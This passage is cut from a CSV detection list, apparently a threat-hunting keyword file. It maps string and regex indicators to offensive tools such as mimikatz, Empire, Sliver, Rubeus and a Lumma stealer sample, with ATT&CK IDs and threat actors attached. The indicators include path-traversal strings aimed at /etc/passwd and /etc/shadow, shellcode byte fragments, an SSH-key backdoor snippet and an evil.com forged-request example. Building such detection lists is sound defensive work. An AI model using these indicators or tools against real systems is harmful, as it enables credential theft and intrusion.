Evasion","https://github.com/antonioCoco/RunasCs","1","0","#base64","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","4013" "*$shellcode += 0x65,0x48,0x8b,0x42,0x60*",".{0,1000}\$shellcode\s\+\=\s0x65,0x48,0x8b,0x42,0x60.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","4014" "*$shellcode += 0x65,0x48,0x8b,0x42,0x60*",".{0,1000}\$shellcode\s\+\=\s0x65,0x48,0x8b,0x42,0x60.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - 
T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","4015" "*$SmbLoginSpray=*",".{0,1000}\$SmbLoginSpray\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","4016" "*$SprayEmptyPasswords*",".{0,1000}\$SprayEmptyPasswords.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","4017" "*$SQLC2Command*",".{0,1000}\$SQLC2Command.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","4018" "*$StealToken*",".{0,1000}\$StealToken.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","4019" "*$Taskname=""Tater""*",".{0,1000}\$Taskname\=\""Tater\"".{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#scheduledtask","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","4020" "*$ThisIsNotTheStringYouAreLookingFor*",".{0,1000}\$ThisIsNotTheStringYouAreLookingFor.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","4022" "*$TotalNbCurrentPwdDiscovered*",".{0,1000}\$TotalNbCurrentPwdDiscovered.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","4023" "*$tunneler_dir/loclx.log*",".{0,1000}\$tunneler_dir\/loclx\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4024" "*$VeaamRegPath*SqlDatabaseName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlDatabaseName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","4025" "*$VeaamRegPath*SqlInstanceName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlInstanceName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","4026" "*$VeaamRegPath*SqlServerName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlServerName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","4027" "*%3u - Directory '%s' (*.kirbi)*",".{0,1000}\%3u\s\-\sDirectory\s\'\%s\'\s\(.{0,1000}\.kirbi\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black 
Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","4029" "*%appdaedx765ta%/Binaedx765nce*",".{0,1000}\%appdaedx765ta\%\/Binaedx765nce.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4030" "*%APPDATA%/Indexing.*",".{0,1000}\%APPDATA\%\/Indexing\..{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","4031" "*%appdata%\(s)AINT*",".{0,1000}\%appdata\%\\\(s\)AINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","4032" "*%APPDATA%\Windows:winrm.vbs*",".{0,1000}\%APPDATA\%\\Windows\:winrm\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","4033" "*%appdedx765ata%/Eledx765ectrum*",".{0,1000}\%appdedx765ata\%\/Eledx765ectrum.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4034" "*%appdedx765ata%/Etheedx765reum*",".{0,1000}\%appdedx765ata\%\/Etheedx765reum.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on 
github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4035" "*%localaedx765ppdata%*",".{0,1000}\%localaedx765ppdata\%.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4037" "*%loedx765calappedx765data*",".{0,1000}\%loedx765calappedx765data.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4039" "*%qwqdanchun%*",".{0,1000}\%qwqdanchun\%.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","4040" "*%tmp%\void.zip*",".{0,1000}\%tmp\%\\void\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 
- T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","4043" "*%userproedx765file%*",".{0,1000}\%userproedx765file\%.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4045" "*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*",".{0,1000}\&\&\scat\s\/etc\/motd.{0,1000}exec\s\-a\s\-\$\(basename\s\$SHELL\)\s\$SHELL.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - FANCY BEAR","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","#linux","N/A","10","9","N/A","N/A","N/A","N/A","4047" "*&passwd=Winter2020&ok=Log+In*",".{0,1000}\&passwd\=Winter2020\&ok\=Log\+In.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential 
Access","https://github.com/0xZDH/Omnispray","1","0","#linux","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","4050" "*&sliverpb.KillReq*",".{0,1000}\&sliverpb\.KillReq.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","4051" "*(!soaphound=*",".{0,1000}\(!soaphound\=.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#ldap","ioc in ldap query https://github.com/FalconForceTeam/SOAPHound/blob/818a0b5add9d70c3d210f0ddcde781a85cd0cba2/ADWSUtils.cs#L42C21-L42C30","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","4052" "*(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(!(userAccountControl:1.2.840.113556.1.4.803:=8192))(!(userAccountControl:1.2.840.113556.1.4.803:=67100867)))*",".{0,1000}\(\&\(objectCategory\=computer\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=8192\)\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=67100867\)\)\).{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - 
Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","N/A","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","4054" "*(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*)(!(userAccountControl:1.2.840.113556.1.4.803:=8192))(!(userAccountControl:1.2.840.113556.1.4.803:=67100867)))*",".{0,1000}\(\&\(objectCategory\=computer\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\(operatingSystem\=.{0,1000}server.{0,1000}\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=8192\)\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=67100867\)\)\).{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","N/A","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","4055" "*(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(userAccountControl:1.2.840.113556.1.4.803:=8192))*",".{0,1000}\(\&\(objectCategory\=computer\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=8192\)\).{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","N/A","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","4056" "*((gv *MDr*).NamE[3,11,2] -join ''*",".{0,1000}\(\(gv\s.{0,1000}MDr.{0,1000}\)\.NamE\[3,11,2\]\s\-join\s\'\'.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","4066" "*(+) Pwned Token: * Status code: * Response: *",".{0,1000}\(\+\)\sPwned\sToken\:\s.{0,1000}\sStatus\scode\:\s.{0,1000}\sResponse\:\s.{0,1000}","offensive_tool_keyword","POC","PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855","T1078.001 - T1078.003 - T1078.004 - T1078 - T1189","TA0006 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sinsinology/CVE-2024-29855","1","0","N/A","N/A","10","1","17","7","2024-06-17T10:45:06Z","2024-06-13T08:32:55Z","4076" "*(Get-Process lsass).Id*",".{0,1000}\(Get\-Process\slsass\)\.Id.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4078" "*(INFO) Spraying JWT Tokens: *",".{0,1000}\(INFO\)\sSpraying\sJWT\sTokens\:\s.{0,1000}","offensive_tool_keyword","POC","PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855","T1078.001 - T1078.003 - T1078.004 - T1078 - T1189","TA0006 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sinsinology/CVE-2024-29855","1","0","N/A","N/A","10","1","17","7","2024-06-17T10:45:06Z","2024-06-13T08:32:55Z","4079" "*(Invoke-WebRequest -Uri ""https://ifconfig.me/ip"").Content*",".{0,1000}\(Invoke\-WebRequest\s\-Uri\s\""https\:\/\/ifconfig\.me\/ip\""\)\.Content.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","4080" "*(msds-supportedencryptiontypes=0)(msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4)))*",".{0,1000}\(msds\-supportedencryptiontypes\=0\)\(msds\-supportedencryptiontypes\:1\.2\.840\.113556\.1\.4\.803\:\=4\)\)\).{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","4082" "*(msds-supportedencryptiontypes=0)(msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4)))*",".{0,1000}\(msds\-supportedencryptiontypes\=0\)\(msds\-supportedencryptiontypes\:1\.2\.840\.113556\.1\.4\.803\:\=4\)\)\).{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","4083" "*(not launching GPOddity SMB server)*",".{0,1000}\(not\slaunching\sGPOddity\sSMB\sserver\).{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","4084" "*(prog=""bpf-keylogger""*",".{0,1000}\(prog\=\""bpf\-keylogger\"".{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","4087" "*(Program.MiniDump minidump*",".{0,1000}\(Program\.MiniDump\sminidump.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","4088" "*(SHADOW DUMPER v1.0)*",".{0,1000}\(SHADOW\sDUMPER\sv1\.0\).{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","4089" "*('Successfully backdoored entry point with jump/call to shellcode*",".{0,1000}\(\'Successfully\sbackdoored\sentry\spoint\swith\sjump\/call\sto\sshellcode.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","4090" "**PSEXECSVC19=b64decode(*",".{0,1000}.{0,1000}PSEXECSVC19\=b64decode\(.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - 
TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#content","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","4092" "*. Nice assembly :D .*",".{0,1000}\.\sNice\sassembly\s\:D\s\..{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","4093" "*.*autodiscover\.json.*Powershell.*",".{0,1000}\..{0,1000}autodiscover\\\.json\..{0,1000}Powershell\..{0,1000}","offensive_tool_keyword","POC","forged request. exemple: autodiscover/autodiscover.json?@evil.com/&Email=autodiscover/autodiscover.json%3f@evil.com","T1190 - T1140 - T1564 - T1204 - T1505","TA0001 - TA0005","N/A","N/A","Exploitation tool","https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4094" "*... every office needs a tool like Georg*",".{0,1000}\.\.\.\severy\soffice\sneeds\sa\stool\slike\sGeorg.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","4095" "*../../../../../../etc/passwd*",".{0,1000}\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","4097" "*../../../../../../etc/shadow*",".{0,1000}\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/shadow.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","4098" "*..\..\..\..\..\..\..\windows\system32\cmd.exe /c *",".{0,1000}\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\windows\\system32\\cmd\.exe\s\/c\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - 